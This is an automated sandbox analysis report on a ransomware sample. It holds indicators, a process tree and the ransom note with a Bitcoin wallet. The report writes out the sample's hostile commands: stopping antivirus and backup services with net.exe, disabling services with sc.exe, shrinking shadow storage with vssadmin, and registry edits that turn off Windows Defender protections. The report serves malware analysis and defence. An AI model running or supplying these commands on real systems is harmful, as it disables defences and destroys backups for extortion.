Analysis
-
max time kernel
81s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-06-2022 18:29
Static task
static1
Behavioral task
behavioral1
Sample
7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe
Resource
win10v2004-20220414-en
General
-
Target
7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe
-
Size
82KB
-
MD5
d1b3c544cb322538e43938174b05eee2
-
SHA1
3f8ca284369b714e80838d2d77c2014d1fbe9442
-
SHA256
7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2
-
SHA512
49f28ce81ba7736eca1a881df9a69fac82022b620cc87d56f2597fc8ec6ca7f53485d70d6ccd612b1a1c16c0d3e5cf958ba317101d95091cb347348cdcf32c2a
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/3948-130-0x0000000000220000-0x000000000023A000-memory.dmp disable_win_def -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 21 3720 mshta.exe 22 3720 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 3800 frrto0ds.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\PingOptimize.raw.crypted 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1572 sc.exe 4636 sc.exe 1496 sc.exe 4680 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1436 vssadmin.exe 1096 vssadmin.exe 4600 vssadmin.exe 1484 vssadmin.exe 4792 vssadmin.exe 1292 vssadmin.exe 1300 vssadmin.exe 1716 vssadmin.exe 4932 vssadmin.exe 1492 vssadmin.exe 4284 vssadmin.exe 4012 vssadmin.exe 116 vssadmin.exe 2672 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 4908 taskkill.exe 4944 taskkill.exe 2160 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1824 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 1476 powershell.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 1476 powershell.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 2160 taskkill.exe Token: SeDebugPrivilege 4908 taskkill.exe Token: SeDebugPrivilege 4944 taskkill.exe Token: SeBackupPrivilege 3712 vssvc.exe Token: SeRestorePrivilege 3712 vssvc.exe Token: SeAuditPrivilege 3712 vssvc.exe Token: SeAssignPrimaryTokenPrivilege 3800 frrto0ds.exe Token: SeIncreaseQuotaPrivilege 3800 frrto0ds.exe Token: SeImpersonatePrivilege 3800 frrto0ds.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3948 wrote to memory of 1476 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 80 PID 3948 wrote to memory of 1476 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 80 PID 3948 wrote to memory of 4068 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 81 PID 3948 wrote to memory of 4068 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 81 PID 3948 wrote to memory of 2508 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 82 PID 3948 wrote to memory of 2508 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 82 PID 3948 wrote to memory of 3500 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 84 PID 3948 wrote to memory of 3500 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 84 PID 3948 wrote to memory of 632 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 96 PID 3948 wrote to memory of 632 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 96 PID 3948 wrote to memory of 3028 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 94 PID 3948 wrote to memory of 3028 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 94 PID 3948 wrote to memory of 2500 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 87 PID 3948 wrote to memory of 2500 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 87 PID 3948 wrote to memory of 1848 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 88 PID 3948 wrote to memory of 1848 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 88 PID 2508 wrote to memory of 4760 2508 net.exe 93 PID 2508 wrote to memory of 4760 2508 net.exe 93 PID 3948 wrote to memory of 4604 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 127 PID 3948 wrote to memory of 4604 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 127 PID 3500 wrote to memory of 3664 3500 net.exe 92 PID 3500 wrote to memory of 3664 3500 net.exe 92 PID 4068 wrote to memory of 4620 4068 net.exe 91 PID 4068 wrote to memory of 4620 4068 net.exe 91 PID 3948 wrote to memory of 4732 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 98 PID 3948 wrote to memory of 4732 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 98 PID 3948 wrote to memory of 4424 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 100 PID 3948 wrote to memory of 4424 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 100 PID 3028 wrote to memory of 4000 3028 net.exe 116 PID 3028 wrote to memory of 4000 3028 net.exe 116 PID 3948 wrote to memory of 1940 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 101 PID 3948 wrote to memory of 1940 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 101 PID 632 wrote to memory of 4816 632 net.exe 102 PID 632 wrote to memory of 4816 632 net.exe 102 PID 2500 wrote to memory of 4920 2500 net.exe 104 PID 2500 wrote to memory of 4920 2500 net.exe 104 PID 3948 wrote to memory of 1704 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 114 PID 3948 wrote to memory of 1704 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 114 PID 3948 wrote to memory of 972 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 112 PID 3948 wrote to memory of 972 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 112 PID 4604 wrote to memory of 3624 4604 net.exe 110 PID 4604 wrote to memory of 3624 4604 net.exe 110 PID 3948 wrote to memory of 1188 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 106 PID 3948 wrote to memory of 1188 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 106 PID 1848 wrote to memory of 208 1848 net.exe 105 PID 1848 wrote to memory of 208 1848 net.exe 105 PID 3948 wrote to memory of 428 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 107 PID 3948 wrote to memory of 428 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 107 PID 4424 wrote to memory of 3572 4424 net.exe 121 PID 4424 wrote to memory of 3572 4424 net.exe 121 PID 3948 wrote to memory of 3720 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 117 PID 3948 wrote to memory of 3720 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 117 PID 1940 wrote to memory of 4140 1940 net.exe 119 PID 1940 wrote to memory of 4140 1940 net.exe 119 PID 4732 wrote to memory of 3732 4732 net.exe 118 PID 4732 wrote to memory of 3732 4732 net.exe 118 PID 3948 wrote to memory of 4088 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 122 PID 3948 wrote to memory of 4088 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 122 PID 1704 wrote to memory of 4028 1704 net.exe 125 PID 1704 wrote to memory of 4028 1704 net.exe 125 PID 3948 wrote to memory of 748 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 123 PID 3948 wrote to memory of 748 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 123 PID 3948 wrote to memory of 1876 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 151 PID 3948 wrote to memory of 1876 3948 7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe 151
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe"C:\Users\Admin\AppData\Local\Temp\7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies extensions of user files
- Checks computer location settings
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4620
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:4760
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:3664
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:4920
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:208
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:4000
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:4816
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:3732
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:3572
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:4140
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:1188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:4312
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:4216
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:3740
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4028
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:3720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2776
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:4088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:1048
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:2268
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:4604
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:3728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:1540
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:4780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:2980
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:5060
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:3692
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:1932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:3052
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:3100
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:4892
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:1876
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:4008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:3464
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:3968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:2680
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:4800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:2640
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:4136
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:4888
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2500
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:2180
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:3460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:428
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:4564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:3912
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:1424
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:1572
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:4636
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:1496
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:4680
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4600
-
-
